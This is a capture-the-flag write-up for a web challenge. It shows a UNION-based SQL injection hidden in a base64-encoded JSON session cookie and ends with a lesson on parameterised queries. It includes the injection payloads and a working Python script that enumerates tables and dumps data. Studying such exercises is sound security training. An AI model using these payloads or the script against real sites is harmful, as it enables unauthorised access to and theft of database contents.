The Challenge

The snack shop stores the session cart (or preference) as a base64-encoded JSON cookie. The backend decodes it and runs SELECT ... WHERE id = <cookie_id>. None of the user-visible fields are injectable — the vulnerability is in the cookie.

Approach

Three-phase UNION-based injection:

  1. Enumerate tablesUNION SELECT table_name FROM information_schema.tables WHERE table_schema = database()
  2. Enumerate columnsUNION SELECT column_name FROM information_schema.columns WHERE table_name = 'flags'
  3. Dump flagUNION SELECT flag FROM flags

Each payload is placed in the ID field of the JSON object, the whole JSON is base64-encoded, and the result is set as the cookie value.

Solution

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

import requests, base64, json

site = "http://sn4ck.challs.olicyber.it/"

def make_cookie(payload):
    data = json.dumps({"ID": payload})
    return base64.b64encode(data.encode()).decode()

session = requests.Session()

# Phase 1: enumerate tables
c1 = make_cookie("0 UNION SELECT table_name FROM information_schema.tables WHERE table_schema = database() -- ")
r1 = session.get(site, cookies={"session": c1})
print("TABLES:", r1.text)

# Phase 2: enumerate columns in 'flags'
c2 = make_cookie("0 UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'flags' -- ")
r2 = session.get(site, cookies={"session": c2})
print("COLUMNS:", r2.text)

# Phase 3: extract flag
c3 = make_cookie("0 UNION SELECT flag FROM flags -- ")
r3 = session.get(site, cookies={"session": c3})
print("FLAG:", r3.text)

make_cookie() serialises the dict, base64-encodes it, and returns the cookie value. The 0 UNION SELECT prefix ensures the original row is empty (no real ID=0) so only the injected row is returned.

What I Learned

Cookie values that are base64-decoded and used in SQL queries without parameterisation are SQL-injectable. The encoding layer is not a sanitisation layer. All transport formats — cookies, headers, JSON — must treat their contents as untrusted input and use parameterised queries.